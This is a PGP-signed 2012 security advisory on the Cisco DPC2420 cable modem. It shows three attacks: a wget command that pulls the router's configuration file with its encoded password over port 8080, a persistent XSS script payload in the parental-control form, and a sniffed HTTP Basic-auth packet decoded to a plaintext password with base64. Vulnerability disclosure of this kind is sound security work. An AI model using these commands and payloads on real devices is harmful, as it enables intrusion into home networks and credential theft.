-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ## ## -> Title: DPC2420 Multiple vulnerabilities ## -> Author: Facundo M. de la Cruz (tty0) ## -> E-mail: fmdlc@code4life.com.ar ##=20 [0x00]> Details Vendor : Cisco Model : DPC2420 type : Cablemodem router.=20 Firmware: D2425-P10-13-v202r12811-110511as-TRO.bin Software: D2425-P10-13-v202r12811-110511as-TRO Website : http://www.cisco.com/web/consumer/support/modem_DPC2420.html [0x01]> Configuration file disclosure Some ISP's (like the Argentinean Telecentro) could make some changes in the= router configration via the=20 TCP 8080 port. If the remote config option is enabled and the port is not filter, an attac= ker can download this file=20 calling the correct URL. For example: $ wget http://foobar:8080/filename.gwc -O filename.gwc=20 - --2012-12-08 21:24:43-- http://foobar:8080/filename.gwc Connecting to foobar:8080... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [application/octet-stream Content-transfer-encoding: bi= nary] Saving to: =E2=80=9Cfilename.gwc=E2=80=9D [ <=3D> ] 15,= 927 50.9K/s in 0.3s =20 2012-12-08 21:24:43 (50.9 KB/s) - =E2=80=9Cfilename.gwc=E2=80=9D saved [159= 27] $ head -n 10 filename.gwc=20 CRCVALUE=3D4144540802; #<<Begin of Configuration File>> Version=3D1.1; Created Date=3D2012/12/8; Created Time=3D21:24:43; Model Number=3DDPC2420; Serial Number=3D234905123; User Password=3Dky3gUCBmdwbaviPW5GxMZ8vdgzHjvS3wKfdF2Lhbdwq+S6qn+1fvgs54YBw= l0jX2glgaQuXx27Eo3FgAz5E1N7bk9yR 7hDbzGS+y7XY4jJjY5yin5SkqAQp9GJl/sZO4t4D7TJzy2oV43flEwmdIPkyJC74zTOYZhb24UL= Jz3HV6ci5wn3gMPi0rSTkUc3pzHdiK WMMAsuMrYBi5MU9yqZ1vhCfC/c2Is1xgU1Kq0Y1Wcn2LdmRFU6+7rjRuN6iisAQZRQcF/kiym5V= ewYRBbnRNKjMXC0fw+M9y4V7Y8S4B6 3XuEwcq3OPUSLWKaA6yPDN5e5ZNxwJJuxldirDXBg=3D=3D; [---OUTPUT OMITTED FOR SPACE REASONS---] [0x02]> - Persistent XSS With a valid user in the router web interface for managment and configurati= on, a user could insert JavaScript code in this forms and make a XSS, for example add a parental rule called "= '/><script>alert(1)</script>. http://192.168.0.1/RgParentalBasic.asp - -> Attachments: http://tty0.code4life.com.ar/CISCO-DPC2420-XSS.png [0x03]> Authtype Basic=20 An attacker making an ARP poisoning attack could get the router loggin cred= entials due the web interface=20 authentication type is auth-basic.=20 Then the attacker could get the Base64 encoded password and convert it to p= lain text easily.=20 20:58:47.879985 IP 172.16.1.242.34464 > 192.168.0.1.http: Flags [P.], seq 0= :372, ack 1, win 115 0x0000: 4500 01a8 fdf4 4000 4006 ccaf ac10 01f2 E.....@.@....... 0x0010: c0a8 0001 86a0 0050 e4cf 13e5 76c7 819e .......P....v... 0x0020: 8018 0073 03c2 0000 0101 080a 055f ee19 ...s........._.. 0x0030: 0000 be7e 4745 5420 2f73 6967 6e61 6c2e ...~GET./signal. 0x0040: 6173 7020 4854 5450 2f31 2e31 0d0a 486f asp.HTTP/1.1..Ho 0x0050: 7374 3a20 3139 322e 3136 382e 302e 310d st:.192.168.0.1. 0x0060: 0a55 7365 722d 4167 656e 743a 204d 6f7a .User-Agent:.Moz 0x0070: 696c 6c61 2f35 2e30 2028 5831 313b 204c illa/5.0.(X11;.L 0x0080: 696e 7578 2078 3836 5f36 343b 2072 763a inux.x86_64;.rv: 0x0090: 3136 2e30 2920 4765 636b 6f2f 3230 3130 16.0).Gecko/2010 0x00a0: 3031 3031 2046 6972 6566 6f78 2f31 362e 0101.Firefox/16. 0x00b0: 300d 0a41 6363 6570 743a 2074 6578 742f 0..Accept:.text/ 0x00c0: 6874 6d6c 2c61 7070 6c69 6361 7469 6f6e html,application 0x00d0: 2f78 6874 6d6c 2b78 6d6c 2c61 7070 6c69 /xhtml+xml,appli 0x00e0: 6361 7469 6f6e 2f78 6d6c 3b71 3d30 2e39 cation/xml;q=3D0.= 9 0x00f0: 2c2a 2f2a 3b71 3d30 2e38 0d0a 4163 6365 ,*/*;q=3D0.8..Acc= e 0x0100: 7074 2d4c 616e 6775 6167 653a 2065 6e2d pt-Language:.en- 0x0110: 5553 2c65 6e3b 713d 302e 350d 0a41 6363 US,en;q=3D0.5..Ac= c 0x0120: 6570 742d 456e 636f 6469 6e67 3a20 677a ept-Encoding:.gz 0x0130: 6970 2c20 6465 666c 6174 650d 0a43 6f6e ip,.deflate..Con 0x0140: 6e65 6374 696f 6e3a 206b 6565 702d 616c nection:.keep-al 0x0150: 6976 650d 0a52 6566 6572 6572 3a20 6874 ive..Referer:.ht 0x0160: 7470 3a2f 2f31 3932 2e31 3638 2e30 2e31 tp://192.168.0.1 0x0170: 2f77 6562 7374 6172 2e68 746d 6c0d 0a41 /webstar.html..A 0x0180: 7574 686f 7269 7a61 7469 6f6e 3a20 4261 uthorization:.Ba 0x0190: 7369 6320 4f6b 4d30 626d fa38 3443 a9c0 sic.aWFtYXBhc3N3 0x01a0: 1b4e 1134 640a 054b ZAo=3D=3D.... - From 0x0180 offset to the end of the packet payload the attacker could ge= t the password=20 encoded with Base64 and simply convert it to plain text: $ echo aWFtYXBhc3N3ZAo=3D=3D | base64 -d iamapassword - --- 1355011796 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBAgAGBQJQxAalAAoJENeXyOFXJgeJY5cP/2/1n/KGlXcyGLPbbzOa2517 EW4UXl4apvKWWOfRfem7+zA/Y4Epxw2l3153Dbp52u2FWPSHzzI3ETK3zY8EYGjL JkBixPSURV8wPwl33XlM/i0dYbtgVspYEgbtFF/ox1mHe4yPapageu3W0rQvf1fX IcmS7gS7os65ch9nLH5CpqJBcpxw+n131iI8g5yJ8rmGmkjre8cIwsvG4tNfyZGo X96pgTzjYnLQww1UoGSkhhKEAudCwb6gqsuGNSbal/Sg1KXj3vmqeZlxWrDEGcuV fbyGYrn5/+mlayzZLChPSoZrET6qKr78PEPGz5sp0d4mRVz6txr0tpnmmY7aIKL0 HlwhlN6nCbzmuq1RrBL+1FHMAP0Xi7JN6WH5AuDW75r5QO8CyYxIm8TlqXMScJYH bhX2CmfqkYpKsx3bbxDlqn5cCLUUdEm7UM/TuLcvzzAiyamBQgsrNCI6TOXClFRB zf321LYlndkJuziYkjTjnJHtroaNh9I0jJMZhVFLJSTuAXmCp0OutPveWEvEX/h9 s6/7Iyi952A3YkqCEsy4q8JUaoxGLMvXeUZM71zVvwEeF8M/2BPziU/JleHMdXWq X2XH8V94KuiILuFSeS+rtT5ILJDHyWL9uVc1wIWvl33jnhPqSCgPlWvwLuWHBf+G E7C4vqJfmBNShPTbtb67 =3DEzto -----END PGP SIGNATURE-----Брой прочитания на тази страница: 1042
Cisco DPC2420 Multiples Vulnerabilities